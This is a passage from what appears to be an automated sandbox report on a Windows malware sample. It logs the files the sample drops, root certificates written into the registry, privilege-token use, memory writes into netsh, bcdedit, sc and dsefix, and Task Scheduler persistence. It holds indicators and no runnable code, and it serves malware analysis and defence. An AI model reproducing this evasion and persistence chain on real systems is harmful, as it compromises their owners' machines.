a49e4e08144b6dfd706d6b1a63bd64e61fb7cef0f29f2ebb1bb7f250887392c2e2e3168d9a3202ab8e18dde91011ee7e35ab90af3e30947ad0333da7650ff5fc8e9e62cf47442c015dbb1db532d247d2382ed0fe81dc326a1eb5ee3cd5fce7811d19c32442ea6339a9 C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474 C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = 0f0000000100000014000000ce0e658aa3e847e467a147b3049191093d055e6f0b0000000100000034000000420061006c00740069006d006f007200650020004300790062006500720054007200750073007400200052006f006f007400000053000000010000002400000030223020060a2b06010401b13e01640130123010060a2b0601040182373c0101030200c0140000000100000014000000e59d5930824758ccacfa085436867b3ab5044df01d0000000100000010000000918ad43a9475f78bb5243de886d8103c09000000010000000c000000300a06082b06010505070301030000000100000014000000d4de20d05e66fc53fe1a50882c78db2852cae47420000000010000007b030000308203773082025fa0030201020204020000b9300d06092a864886f70d0101050500305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f74301e170d3030303531323138343630305a170d3235303531323233353930305a305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100a304bb22ab983d57e826729ab579d429e2e1e89580b1b0e35b8e2b299a64dfa15dedb009056ddb282ece62a262feb488da12eb38eb219dc0412b01527b8877d31c8fc7bab988b56a09e773e81140a7d1ccca628d2de58f0ba650d2a850c328eaf5ab25878a9a961ca967b83f0cd5f7f952132fc21bd57070f08fc012ca06cb9ae1d9ca337a77d6f8ecb9f16844424813d2c0c2a4ae5e60feb6a605fcb4dd075902d459189863f5a563e0900c7d5db2067af385eaebd403ae5e843e5fff15ed69bcf939367275cf77524df3c9902cb93de5c923533f1f2498215c079929bdc63aece76e863a6b97746333bd681831f0788d76bffc9e8e5d2a86a74d90dc271a390203010001a3453043301d0603551d0e04160414e59d5930824758ccacfa085436867b3ab5044df030120603551d130101ff040830060101ff020103300e0603551d0f0101ff040403020106300d06092a864886f70d01010505000382010100850c5d8ee46f51684205a0ddbb4f27258403bdf764fd2dd730e3a41017ebda2929b6793f76f6191323b8100af958a4d46170bd04616a128a17d50abdc5bc307cd6e90c258d86404feccca37e38c637114feddd68318e4cd2b30174eebe755e07481a7f70ff165c84c07985b805fd7fbe6511a30fc002b4f852373904d5a9317a18bfa02af41299f7a34582e33c5ef59d9eb5c89e7c2ec8a49e4e08144b6dfd706d6b1a63bd64e61fb7cef0f29f2ebb1bb7f250887392c2e2e3168d9a3202ab8e18dde91011ee7e35ab90af3e30947ad0333da7650ff5fc8e9e62cf47442c015dbb1db532d247d2382ed0fe81dc326a1eb5ee3cd5fce7811d19c32442ea6339a9 C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = 040000000100000010000000acb694a59c17e0d791529bb19706a6e4030000000100000014000000d4de20d05e66fc53fe1a50882c78db2852cae47409000000010000000c000000300a06082b060105050703011d0000000100000010000000918ad43a9475f78bb5243de886d8103c140000000100000014000000e59d5930824758ccacfa085436867b3ab5044df053000000010000002400000030223020060a2b06010401b13e01640130123010060a2b0601040182373c0101030200c00b0000000100000034000000420061006c00740069006d006f007200650020004300790062006500720054007200750073007400200052006f006f00740000000f0000000100000014000000ce0e658aa3e847e467a147b3049191093d055e6f20000000010000007b030000308203773082025fa0030201020204020000b9300d06092a864886f70d0101050500305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f74301e170d3030303531323138343630305a170d3235303531323233353930305a305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100a304bb22ab983d57e826729ab579d429e2e1e89580b1b0e35b8e2b299a64dfa15dedb009056ddb282ece62a262feb488da12eb38eb219dc0412b01527b8877d31c8fc7bab988b56a09e773e81140a7d1ccca628d2de58f0ba650d2a850c328eaf5ab25878a9a961ca967b83f0cd5f7f952132fc21bd57070f08fc012ca06cb9ae1d9ca337a77d6f8ecb9f16844424813d2c0c2a4ae5e60feb6a605fcb4dd075902d459189863f5a563e0900c7d5db2067af385eaebd403ae5e843e5fff15ed69bcf939367275cf77524df3c9902cb93de5c923533f1f2498215c079929bdc63aece76e863a6b97746333bd681831f0788d76bffc9e8e5d2a86a74d90dc271a390203010001a3453043301d0603551d0e04160414e59d5930824758ccacfa085436867b3ab5044df030120603551d130101ff040830060101ff020103300e0603551d0f0101ff040403020106300d06092a864886f70d01010505000382010100850c5d8ee46f51684205a0ddbb4f27258403bdf764fd2dd730e3a41017ebda2929b6793f76f6191323b8100af958a4d46170bd04616a128a17d50abdc5bc307cd6e90c258d86404feccca37e38c637114feddd68318e4cd2b30174eebe755e07481a7f70ff165c84c07985b805fd7fbe6511a30fc002b4f852373904d5a9317a18bfa02af41299f7a34582e33c5ef59d9eb5c89e7c2ec8a49e4e08144b6dfd706d6b1a63bd64e61fb7cef0f29f2ebb1bb7f250887392c2e2e3168d9a3202ab8e18dde91011ee7e35ab90af3e30947ad0333da7650ff5fc8e9e62cf47442c015dbb1db532d247d2382ed0fe81dc326a1eb5ee3cd5fce7811d19c32442ea6339a9 C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4 C:\Windows\rss\csrss.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a42000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6 C:\Windows\rss\csrss.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 1400000001000000140000004e2254201895e6e36ee60ffafab912ed06178f39030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a40f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a32000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6 C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 19000000010000001000000014c3bd3549ee225aece13734ad8ca0b81400000001000000140000004e2254201895e6e36ee60ffafab912ed06178f39030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a40f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a3040000000100000010000000e4a68ac854ac5242460afd72481b2a442000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6 C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Windows\rss\csrss.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Windows\rss\csrss.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Windows\rss\csrss.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\AppData\Local\Temp\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\rss\csrss.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\sc.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\sc.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2604 wrote to memory of 2356 N/A C:\Users\Admin\AppData\Local\Temp\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe C:\Windows\system32\cmd.exe
PID 2604 wrote to memory of 2356 N/A C:\Users\Admin\AppData\Local\Temp\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe C:\Windows\system32\cmd.exe
PID 2604 wrote to memory of 2356 N/A C:\Users\Admin\AppData\Local\Temp\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe C:\Windows\system32\cmd.exe
PID 2604 wrote to memory of 2356 N/A C:\Users\Admin\AppData\Local\Temp\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe C:\Windows\system32\cmd.exe
PID 2356 wrote to memory of 2612 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 2356 wrote to memory of 2612 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 2356 wrote to memory of 2612 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 2604 wrote to memory of 2456 N/A C:\Users\Admin\AppData\Local\Temp\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe C:\Windows\rss\csrss.exe
PID 2604 wrote to memory of 2456 N/A C:\Users\Admin\AppData\Local\Temp\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe C:\Windows\rss\csrss.exe
PID 2604 wrote to memory of 2456 N/A C:\Users\Admin\AppData\Local\Temp\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe C:\Windows\rss\csrss.exe
PID 2604 wrote to memory of 2456 N/A C:\Users\Admin\AppData\Local\Temp\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe C:\Windows\rss\csrss.exe
PID 2456 wrote to memory of 2432 N/A C:\Windows\rss\csrss.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
PID 2456 wrote to memory of 2432 N/A C:\Windows\rss\csrss.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
PID 2456 wrote to memory of 2432 N/A C:\Windows\rss\csrss.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
PID 2456 wrote to memory of 2432 N/A C:\Windows\rss\csrss.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
PID 1424 wrote to memory of 2276 N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe C:\Windows\system32\bcdedit.exe
PID 1424 wrote to memory of 2276 N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe C:\Windows\system32\bcdedit.exe
PID 1424 wrote to memory of 2276 N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe C:\Windows\system32\bcdedit.exe
PID 1424 wrote to memory of 2044 N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe C:\Windows\system32\bcdedit.exe
PID 1424 wrote to memory of 2044 N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe C:\Windows\system32\bcdedit.exe
PID 1424 wrote to memory of 2044 N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe C:\Windows\system32\bcdedit.exe
PID 1424 wrote to memory of 848 N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe C:\Windows\system32\bcdedit.exe
PID 1424 wrote to memory of 848 N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe C:\Windows\system32\bcdedit.exe
PID 1424 wrote to memory of 848 N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe C:\Windows\system32\bcdedit.exe
PID 1424 wrote to memory of 1052 N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe C:\Windows\system32\bcdedit.exe
PID 1424 wrote to memory of 1052 N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe C:\Windows\system32\bcdedit.exe
PID 1424 wrote to memory of 1052 N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe C:\Windows\system32\bcdedit.exe
PID 1424 wrote to memory of 2888 N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe C:\Windows\system32\bcdedit.exe
PID 1424 wrote to memory of 2888 N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe C:\Windows\system32\bcdedit.exe
PID 1424 wrote to memory of 2888 N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe C:\Windows\system32\bcdedit.exe
PID 1424 wrote to memory of 2984 N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe C:\Windows\system32\bcdedit.exe
PID 1424 wrote to memory of 2984 N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe C:\Windows\system32\bcdedit.exe
PID 1424 wrote to memory of 2984 N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe C:\Windows\system32\bcdedit.exe
PID 1424 wrote to memory of 2980 N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe C:\Windows\system32\bcdedit.exe
PID 1424 wrote to memory of 2980 N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe C:\Windows\system32\bcdedit.exe
PID 1424 wrote to memory of 2980 N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe C:\Windows\system32\bcdedit.exe
PID 1424 wrote to memory of 2528 N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe C:\Windows\system32\bcdedit.exe
PID 1424 wrote to memory of 2528 N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe C:\Windows\system32\bcdedit.exe
PID 1424 wrote to memory of 2528 N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe C:\Windows\system32\bcdedit.exe
PID 1424 wrote to memory of 2856 N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe C:\Windows\system32\bcdedit.exe
PID 1424 wrote to memory of 2856 N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe C:\Windows\system32\bcdedit.exe
PID 1424 wrote to memory of 2856 N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe C:\Windows\system32\bcdedit.exe
PID 1424 wrote to memory of 2120 N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe C:\Windows\system32\bcdedit.exe
PID 1424 wrote to memory of 2120 N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe C:\Windows\system32\bcdedit.exe
PID 1424 wrote to memory of 2120 N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe C:\Windows\system32\bcdedit.exe
PID 1424 wrote to memory of 1960 N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe C:\Windows\system32\bcdedit.exe
PID 1424 wrote to memory of 1960 N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe C:\Windows\system32\bcdedit.exe
PID 1424 wrote to memory of 1960 N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe C:\Windows\system32\bcdedit.exe
PID 1424 wrote to memory of 2316 N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe C:\Windows\system32\bcdedit.exe
PID 1424 wrote to memory of 2316 N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe C:\Windows\system32\bcdedit.exe
PID 1424 wrote to memory of 2316 N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe C:\Windows\system32\bcdedit.exe
PID 1424 wrote to memory of 1584 N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe C:\Windows\system32\bcdedit.exe
PID 1424 wrote to memory of 1584 N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe C:\Windows\system32\bcdedit.exe
PID 1424 wrote to memory of 1584 N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe C:\Windows\system32\bcdedit.exe
PID 2456 wrote to memory of 1616 N/A C:\Windows\rss\csrss.exe C:\Windows\system32\bcdedit.exe
PID 2456 wrote to memory of 1616 N/A C:\Windows\rss\csrss.exe C:\Windows\system32\bcdedit.exe
PID 2456 wrote to memory of 1616 N/A C:\Windows\rss\csrss.exe C:\Windows\system32\bcdedit.exe
PID 2456 wrote to memory of 1616 N/A C:\Windows\rss\csrss.exe C:\Windows\system32\bcdedit.exe
PID 2456 wrote to memory of 2668 N/A C:\Windows\rss\csrss.exe C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
PID 2456 wrote to memory of 2668 N/A C:\Windows\rss\csrss.exe C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
PID 2456 wrote to memory of 2668 N/A C:\Windows\rss\csrss.exe C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
PID 2456 wrote to memory of 2668 N/A C:\Windows\rss\csrss.exe C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
PID 2792 wrote to memory of 1324 N/A C:\Windows\windefender.exe C:\Windows\SysWOW64\cmd.exe
PID 2792 wrote to memory of 1324 N/A C:\Windows\windefender.exe C:\Windows\SysWOW64\cmd.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe

"C:\Users\Admin\AppData\Local\Temp\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe"

C:\Windows\system32\makecab.exe

